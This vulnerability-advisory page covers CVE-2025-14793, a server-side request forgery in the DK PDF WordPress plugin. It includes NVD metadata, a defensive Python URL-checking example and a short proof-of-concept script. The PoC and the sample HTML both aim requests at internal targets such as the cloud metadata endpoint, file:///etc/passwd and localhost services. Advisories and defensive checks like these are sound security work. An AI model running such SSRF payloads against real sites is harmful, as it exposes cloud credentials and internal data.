Security Vulnerability Report
CVE-2025-14793 CVSS 5.0 MEDIUM

Published: 2026-01-16 07:15:55
Last Modified: 2026-04-15 00:35:42

Description

The DK PDF – WordPress PDF Generator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3.0 via the 'addContentToMpdf' function. This makes it possible for authenticated attackers, author level and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
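The advisory names the sink (addContentToMpdf) but not the request parameter or the fetch mechanism. As an added example, not the plugin's code and not part of the NVD record, the block below shows the check a PDF-generating endpoint needs before handing user-controlled HTML to a renderer that fetches referenced resources: every URL the renderer would request is resolved and refused unless it points at a public address over http(s). The assumption that the SSRF primitive is a resource reference (image, stylesheet, CSS url()) fetched during rendering is mine; the sample post body and the DNS table are constructed so the example runs offline.

```python
import ipaddress
import re
import socket
from html.parser import HTMLParser
from urllib.parse import urlparse

# Address ranges a server-side fetch must never reach. The ipaddress
# is_private/is_loopback/... flags cover most of these; the explicit list
# adds CGNAT and IPv4-mapped IPv6, which those flags miss on older Pythons.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16",   # link-local, incl. the 169.254.169.254 cloud metadata endpoint
    "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]


def resolve_host(host, resolver=socket.getaddrinfo):
    """Every address `host` resolves to. `resolver` has socket.getaddrinfo's
    signature so the example can run offline against a fixed table."""
    try:
        return {ipaddress.ip_address(info[4][0]) for info in resolver(host, None)}
    except (socket.gaierror, ValueError, OSError):
        return set()


def check_url(url, resolver=socket.getaddrinfo):
    """Decide whether a renderer may fetch `url`. Returns (allowed, reason).

    Only http(s) to a host whose *every* resolved address is public passes;
    relative paths and data: URIs pass because they cause no network request."""
    parts = urlparse(url)
    if parts.scheme in ("", "data"):
        return True, "no network fetch"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = {ipaddress.ip_address(host)}   # literal IP, no DNS needed
    except ValueError:
        addrs = resolve_host(host, resolver)
    if not addrs:
        return False, f"{host} does not resolve"
    for ip in addrs:
        if (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved
                or ip.is_multicast or ip.is_unspecified
                or any(ip in net for net in BLOCKED_NETS)):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "public address"


class _ReferenceCollector(HTMLParser):
    """Collects the URLs an HTML-to-PDF renderer fetches while laying out a
    document: image/frame/object sources, linked stylesheets and CSS url()."""
    FETCHED = {"img": "src", "iframe": "src", "object": "data", "link": "href"}

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        attr = self.FETCHED.get(tag)
        if attr and a.get(attr):
            self.urls.append(a[attr])
        self.urls += re.findall(r"url\(\s*['\"]?([^'\")\s]+)", a.get("style") or "")


def unsafe_references(html, resolver=socket.getaddrinfo):
    """[(url, reason)] for every reference in `html` the renderer must refuse."""
    collector = _ReferenceCollector()
    collector.feed(html)
    refused = []
    for url in collector.urls:
        allowed, reason = check_url(url, resolver)
        if not allowed:
            refused.append((url, reason))
    return refused


# Constructed sample post body (not from the advisory): what an author-level
# user might submit to be rendered to PDF.
SAMPLE_POST_HTML = """
<h1>Quarterly report</h1>
<img src="https://cdn.example.com/logo.png">
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
<img src="http://intranet.corp/admin/export.csv">
<img src="file:///etc/passwd">
<img src="/wp-content/uploads/2025/chart.png">
<div style="background: url('http://[::1]:9200/_cat/indices')">search stats</div>
"""

# Constructed DNS table so the example runs offline; production code keeps the
# default socket.getaddrinfo.
FAKE_DNS = {"cdn.example.com": ["93.184.216.34"], "intranet.corp": ["10.0.0.5"]}


def fake_resolver(host, port, *args, **kwargs):
    return [(None, None, None, None, (ip, 0)) for ip in FAKE_DNS.get(host, [])]


if __name__ == "__main__":
    for url, reason in unsafe_references(SAMPLE_POST_HTML, fake_resolver):
        print(f"REFUSE {url}  ({reason})")
```

Two caveats apply to any check of this shape. The resolve-then-fetch sequence is a TOCTOU window (DNS rebinding): the fetch itself must connect to the address that was checked, not re-resolve the name. And an HTTP redirect from a public host to an internal one bypasses a check applied only to the first URL, so redirects have to be followed manually and each hop re-checked. In a WordPress plugin the building blocks for the same policy are wp_http_validate_url() and wp_safe_remote_get(), which reject non-public targets.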

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

DK PDF – WordPress PDF Generator plugin <= 2.3.0 (affected range taken from the advisory text; the NVD record carries no CPE configuration data)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-14793 SSRF PoC for the DK PDF WordPress plugin (<= 2.3.0).
# The advisory names the sink ('addContentToMpdf') but not the request
# parameter; the admin-ajax action and 'ssrf_url' field below are placeholders
# carried over from the original PoC and must be matched to the plugin's actual
# PDF-generation entry point before use.
target_url = "http://target-wordpress-site.com"

# Authenticate as an author-level account, the minimum privilege the advisory requires.
login_url = f"{target_url}/wp-login.php"
session = requests.Session()
credentials = {
    "log": "author_username",
    "pwd": "author_password",
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1",
}
# wp-login.php rejects a POST carrying testcookie=1 unless the browser also
# presents the test cookie it set on the form page; mimic that.
session.cookies.set("wordpress_test_cookie", "WP Cookie check")
session.post(login_url, data=credentials, allow_redirects=False)
if not any(name.startswith("wordpress_logged_in_") for name in session.cookies.keys()):
    raise SystemExit("login failed: no wordpress_logged_in_* cookie was issued")

# SSRF payload: cloud instance metadata, the classic internal target.
ssrf_target = "http://169.254.169.254/latest/meta-data/"

# Trigger PDF generation with the attacker-controlled URL.
pdf_generate_url = f"{target_url}/wp-admin/admin-ajax.php"
pdf_payload = {
    "action": "dkpdf_generate",   # placeholder, see note above
    "post_id": "1",
    "ssrf_url": ssrf_target,      # placeholder for the value that reaches addContentToMpdf
}
response = session.post(pdf_generate_url, data=pdf_payload)
print(f"Response Status: {response.status_code}")
print(f"Response Content: {response.text}")
```

References

https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/modules/PDF/DocumentBuilder.php#L213
https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/templates/dkpdf-index.php#L134
https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/Frontend/WordPressIntegration.php?marks=22-25#L22
https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/PDF/Generator.php?marks=24-56#L24
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440588%40dk-pdf&new=3440588%40dk-pdf&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/b062f72a-542c-4212-af83-4faefbf69bd7?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14793",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-16T07:15:54.623",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The DK PDF – WordPress PDF Generator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3.0 via the 'addContentToMpdf' function. This makes it possible for authenticated attackers, author level and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."
      },
      {
        "lang": "es",
        "value": "El plugin DK PDF – WordPress PDF Generator para WordPress es vulnerable a falsificación de petición del lado del servidor en todas las versiones hasta e incluyendo la 2.3.0 a través de la función 'addContentToMpdf'. Esto hace posible que atacantes autenticados, con nivel de autor o superior, realicen peticiones web a ubicaciones arbitrarias originadas desde la aplicación web y puede ser utilizado para consultar y modificar información de servicios internos."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/modules/PDF/DocumentBuilder.php#L213",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/dk-pdf/tags/2.3.0/templates/dkpdf-index.php#L134",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/Frontend/WordPressIntegration.php?marks=22-25#L22",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/dk-pdf/trunk/modules/PDF/Generator.php?marks=24-56#L24",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440588%40dk-pdf&new=3440588%40dk-pdf&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b062f72a-542c-4212-af83-4faefbf69bd7?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```